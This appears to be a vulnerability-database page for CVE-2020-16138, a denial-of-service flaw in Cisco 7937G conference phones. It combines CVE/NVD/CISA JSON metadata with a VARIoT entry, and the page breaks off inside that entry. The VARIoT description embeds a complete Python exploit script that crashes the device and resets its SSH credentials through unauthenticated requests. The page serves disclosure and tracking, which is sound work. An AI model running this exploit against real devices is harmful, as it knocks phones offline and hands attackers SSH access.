CVE-2020-16138 (GCVE-0-2020-16138)

Vulnerability from cvelistv5 – Published: 2020-08-12 20:09 – Updated: 2024-11-18 17:26

Summary

A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	https://packetstormsecurity.com/files/158819/Cisc…	x_refsource_MISC
	https://www.blacklanternsecurity.com/2020-08-07-C…	x_refsource_MISC
	https://www.cisco.com/c/en/us/products/collateral…	x_refsource_MISC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T13:37:53.796Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2020-16138",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-24T16:09:12.105578Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-18T17:26:51.124Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2020-08-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-08-14T14:16:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
        }
      ],
      "tags": [
        "unsupported-when-assigned"
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-16138",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
            },
            {
              "name": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/",
              "refsource": "MISC",
              "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
            },
            {
              "name": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html",
              "refsource": "MISC",
              "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-16138",
    "datePublished": "2020-08-12T20:09:07",
    "dateReserved": "2020-07-29T00:00:00",
    "dateUpdated": "2024-11-18T17:26:51.124Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"1.4.4.0\", \"versionEndIncluding\": \"1.4.5.7\", \"matchCriteriaId\": \"55A411E1-7568-4E8C-8AA7-B1B088769C69\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:cisco:unified_ip_conference_station_7937g:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F7059B88-1FA4-45DB-9344-296E6F23968D\"}]}]}]",
      "cveTags": "[{\"sourceIdentifier\": \"cve@mitre.org\", \"tags\": [\"unsupported-when-assigned\"]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\\u2019s reference information\"}, {\"lang\": \"es\", \"value\": \"** NO SOPORTADO CUANDO FUE ASIGNADO ** Un problema de denegaci\\u00f3n de servicio en Cisco Unified IP Conference Station 7937G versiones 1-4-4-0 hasta 1-4-5-7, permite a atacantes deshabilitar de remotamente el dispositivo hasta que se apaga y enciende. Nota: No podemos probar que esta vulnerabilidad exista. Por precauci\\u00f3n, este CVE se asigna para brindar un mejor servicio a nuestros clientes y garantizar que todos los que a\\u00fan usan este producto comprendan que el producto est\\u00e1 al final de su vida \\u00fatil y que debe ser eliminado o actualizado. Para m\\u00e1s informaci\\u00f3n sobre esto y c\\u00f3mo actualizar, consulte la informaci\\u00f3n de referencia del CVE\"}]",
      "id": "CVE-2020-16138",
      "lastModified": "2024-11-21T05:06:50.017",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:N/I:N/A:C\", \"baseScore\": 7.8, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2020-08-12T21:15:12.063",
      "references": "[{\"url\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"NVD-CWE-noinfo\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2020-16138\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2020-08-12T21:15:12.063\",\"lastModified\":\"2024-11-21T05:06:50.017\",\"vulnStatus\":\"Modified\",\"cveTags\":[{\"sourceIdentifier\":\"cve@mitre.org\",\"tags\":[\"unsupported-when-assigned\"]}],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information\"},{\"lang\":\"es\",\"value\":\"** NO SOPORTADO CUANDO FUE ASIGNADO ** Un problema de denegaci\u00f3n de servicio en Cisco Unified IP Conference Station 7937G versiones 1-4-4-0 hasta 1-4-5-7, permite a atacantes deshabilitar de remotamente el dispositivo hasta que se apaga y enciende. Nota: No podemos probar que esta vulnerabilidad exista. Por precauci\u00f3n, este CVE se asigna para brindar un mejor servicio a nuestros clientes y garantizar que todos los que a\u00fan usan este producto comprendan que el producto est\u00e1 al final de su vida \u00fatil y que debe ser eliminado o actualizado. Para m\u00e1s informaci\u00f3n sobre esto y c\u00f3mo actualizar, consulte la informaci\u00f3n de referencia del CVE\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:C\",\"baseScore\":7.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.4.4.0\",\"versionEndIncluding\":\"1.4.5.7\",\"matchCriteriaId\":\"55A411E1-7568-4E8C-8AA7-B1B088769C69\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:unified_ip_conference_station_7937g:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7059B88-1FA4-45DB-9344-296E6F23968D\"}]}]}],\"references\":[{\"url\":\"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T13:37:53.796Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2020-16138\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-04-24T16:09:12.105578Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-18T17:26:47.181Z\"}}], \"cna\": {\"tags\": [\"unsupported-when-assigned\"], \"affected\": [{\"vendor\": \"n/a\", \"product\": \"n/a\", \"versions\": [{\"status\": \"affected\", \"version\": \"n/a\"}]}], \"datePublic\": \"2020-08-07T00:00:00\", \"references\": [{\"url\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\\u2019s reference information\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"text\", \"description\": \"n/a\"}]}], \"providerMetadata\": {\"orgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"shortName\": \"mitre\", \"dateUpdated\": \"2020-08-14T14:16:02\"}, \"x_legacyV4Record\": {\"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"version_value\": \"n/a\"}]}, \"product_name\": \"n/a\"}]}, \"vendor_name\": \"n/a\"}]}}, \"data_type\": \"CVE\", \"references\": {\"reference_data\": [{\"url\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"name\": \"https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\", \"refsource\": \"MISC\"}, {\"url\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"name\": \"https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/\", \"refsource\": \"MISC\"}, {\"url\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"name\": \"https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\", \"refsource\": \"MISC\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\\u2019s reference information.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"n/a\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2020-16138\", \"STATE\": \"PUBLIC\", \"ASSIGNER\": \"cve@mitre.org\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2020-16138\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-18T17:26:51.124Z\", \"dateReserved\": \"2020-07-29T00:00:00\", \"assignerOrgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"datePublished\": \"2020-08-12T20:09:07\", \"assignerShortName\": \"mitre\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

VAR-202008-0711

Vulnerability from variot - Updated: 2024-05-17 22:59

There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter

Date: 2020-08-10

Exploit Author: Cody Martin

Vendor Homepage: https://cisco.com

Version: <=SIP-1-4-5-7

Tested On: SIP-1-4-5-5, SIP-1-4-5-7

CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137

!/usr/bin/python

import sys import getopt import requests import paramiko import socket import os

def main(argv): target = "" attack = "" username = "" password = "" divider = "============================================="

help_text = '''

exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider)

if len(sys.argv) == 1:
    print(help_text)
    sys.exit(2)
try:
    opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
except getopt.GetoptError:
    print(help_text)
    sys.exit(2)
for opt, arg in opts:
    if opt == "-h":
        print(help_text)
        sys.exit()
    elif opt in ("-t", "--target"):
        target = arg
    elif opt in ("-a", "--attack"):
        attack = arg
    elif opt in ("-u", "--user"):
        username = arg
    elif opt in ("-p", "--password"):
        password = arg

if username != "" and password != "" and attack == "3":
    print("Starting SSH attack!")
    print(divider)
    print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
    finished = attack_ssh(target, username, password)
elif attack == "1":
    print("Starting DoS reset attack!")
    print(divider)
    print("Target: ", target, "\nAttack: ", attack)
    finished = dos_one(target)
elif attack == "2":
    print("Starting DoS non-reset attack!")
    print(divider)
    print("Target: ", target, "\nAttack: ", attack)
    finished = dos_two(target)

print(divider)

if finished == 1:
    print("DoS reset attack completed!")
elif finished == 2:
    print("DoS non-reset attack completed!")
    print("Device must be power cycled to restore functionality.")
elif finished == 3:
    tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
    connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
    print(tell)
    print("You must specify the key exchange when connecting or the device will be DoS'd!")
    print(connection_example)
elif finished == 0:
    print("Something strange happened. Attack likely unsuccessful.")
sys.exit()

def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1

return 0

def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit()

transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
                                                                       "diffie-hellman-group14-sha1",
                                                                       "diffie-hellman-group1-sha1"]})

fd = os.open("/dev/null", os.O_WRONLY)
savefd = os.dup(2)
os.dup2(fd, 2)

try:
    transport.connect(username="notreal", password="notreal")
except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
    os.dup2(savefd, 2)
    return 2

return 0

def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit()

    r = requests.post(url=url, params=payload_pass, timeout=5)
    if r.status_code != 200:
        print("Device doesn't appear to be functioning or web access is not enabled.")
        sys.exit()
except requests.exceptions.RequestException:
    print("Device doesn't appear to be functioning or web access is not enabled.")
    sys.exit()

return 3

if name == "main": main(sys.argv[1:])

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202008-0711",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "unified ip conference station 7937g",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.4.5.7"
      },
      {
        "model": "unified ip conference station 7937g",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.4.4.0"
      },
      {
        "model": "unified ip conference station 7937g",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "1-4-4-0 \u304b\u3089 1-4-5-7"
      },
      {
        "model": "7937g",
        "scope": "gte",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1-4-4-0,\u003c=1-4-5-7"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.4.5.7",
                    "versionStartIncluding": "1.4.4.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:unified_ip_conference_station_7937g:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cody Martin",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "158817"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      }
